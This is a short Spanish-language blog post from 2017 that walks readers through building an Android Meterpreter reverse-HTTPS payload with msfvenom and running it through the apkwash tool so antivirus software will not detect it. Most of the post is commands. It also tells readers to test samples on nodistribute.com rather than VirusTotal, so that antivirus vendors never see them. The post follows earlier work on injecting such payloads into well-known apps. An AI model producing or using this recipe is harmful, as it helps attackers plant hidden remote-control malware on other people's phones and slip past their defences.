viernes, 24 de marzo de 2017

Creando un payload para android intedectable por los antivirus

Hola amigos:

Hemos creado payloads para android, los hemos inyectado en una aplicación conocida, pero... ¿Cómo podemos evadir el antivirus?

Bien, nos vamos a la página https://github.com/jbreed/apkwash y nos descargamos apkwash.



unzip apkwash-master.zip

nos metemos en el directorio apkwash-master

cd apkwash-master

Cambiamos los permisos de ejecución

chmod +x apkwash

Y lo movemos a /usr/local/bin/.

Creamos un payload

msfvenom -p android/meterpreter/reverse_https LHOST=<IP> LPORT=<PORT> -o <payload>.apk



En la primera ejecución, debería descargar ciertas dependencias, en el caso de que no las descargue y dé un error (como me pasó a mí), las tendréis que instalar a mano, pero es muy fácil y rápido:

mv apktool_2.2.2.jar apktool.jar
chmod +x apktool.jar
mv apktool,jar /usr/local/bin/.

Ahora ejecutamos apkwash

apkwash payload.apk



El nombre que ha puesto al apk indetectable es wash_payload.apk

No subáis los ficheros a virustotal.com. Si los queréis probar, usad nodistribute.com



Si, estáis viendo otros payload.smali en /tmp/payload/smali/com/var1/var2/ deberás actualizar el sistema.





No hay comentarios:

Publicar un comentario

Nota: solo los miembros de este blog pueden publicar comentarios.